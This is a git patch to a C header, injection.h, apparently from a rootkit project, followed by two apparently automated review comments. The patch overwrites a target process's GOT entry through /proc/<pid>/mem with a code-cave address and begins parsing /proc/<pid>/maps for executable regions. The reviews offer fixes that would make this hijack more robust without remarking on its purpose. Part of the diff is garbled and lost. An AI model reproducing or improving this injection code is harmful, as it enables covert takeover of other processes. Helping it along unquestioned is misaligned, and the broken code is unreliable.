From f4b88668b87448d58d680095d9f1f841bcae2840 Mon Sep 17 00:00:00 2001 From: h3xduck Date: Thu, 7 Apr 2022 07:10:00 -0400 Subject: [PATCH] Finished GOT section identification and writing, added parsing of /proc//maps --- src/user/include/utils/mem/injection.h | 35 ++++++++++++++++++++++---- 1 file changed, 30 insertions(+), 5 deletions(-) diff --git a/src/user/include/utils/mem/injection.h b/src/user/include/utils/mem/injection.h index 596e9b3..03c0e42 100644 --- a/src/user/include/utils/mem/injection.h +++ b/src/user/include/utils/mem/injection.h @@ -10,9 +10,11 @@ #include "../common/constants.h" #include "../common/map_common.h" +#include "code_caver.h" + int manage_injection(const struct rb_event* event){ char mem_file_name[100]; - char *buf="AAAAAAAAAAAAA"; + __u64 buf = (__u64)CODE_CAVE_ADDRESS; int mem_fd; @@ -24,12 +26,35 @@ int manage_injection(const struct rb_event* event){ mem_fd = open(mem_file_name, O_RDWR); lseek(mem_fd, event->got_address, SEEK_SET); - for(int ii=0; ii<8; ii++){ - if(write(mem_fd, buf, 1) < 0 ){ - perror("Writing"); + for(int ii=0; iipid); + f = fopen(maps_file, "rt"); + while (fgets(maps_file, 512, f)) { + __u32 pgoff, major, minor; + __u64 from, to, ino; + char flags[4]; + int ret = sscanf(maps_file, "%llx-%llx %4c %x %x:%x %llu ", &from, &to, flags, &pgoff, &major, &minor, &ino); + printf("MAPS: %s\n", maps_file); + + //Parse flags, find executable one + if(flags[2] == 'x'){ + //Candidate for code cave finding + + } + } + + free(maps_file); return 0; }
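Review bot: In the first hunk, `buf` is no longer a buffer but a `__u64` holding `CODE_CAVE_ADDRESS`, and nothing at the declaration says this is the value that gets stored at `event->got_address`. Rename it, or add a comment such as `/* 8-byte value written over the GOT slot at event->got_address */`, so the intent of the later write is readable at the declaration. `CODE_CAVE_ADDRESS` comes from `code_caver.h`, which is not shown, so whether a single constant is valid for every target process cannot be checked from this hunk. `manage_injection` begins in this hunk and its body continues past it.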
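Review bot: In the second hunk, `fopen(maps_file, "rt")` is used without a NULL check, so if the target process has exited or the file is unreadable, the following `fgets` is handed a null stream; add `if (f == NULL) { perror("fopen maps"); free(maps_file); return -1; }`. The `sscanf` result `ret` is never tested, so `flags[2]` is read uninitialised on any line that fails to parse; `if (ret < 3) continue;` before the flags test covers it. No `fclose(f);` is visible before `free(maps_file)`, which would leak one stream per handled event. The text between the new loop header and `>pid);` is lost in this rendering, so the size allocated for `maps_file` cannot be checked against the 512 passed to `fgets`, and the context lines `open`/`lseek` above appear to go unchecked as well.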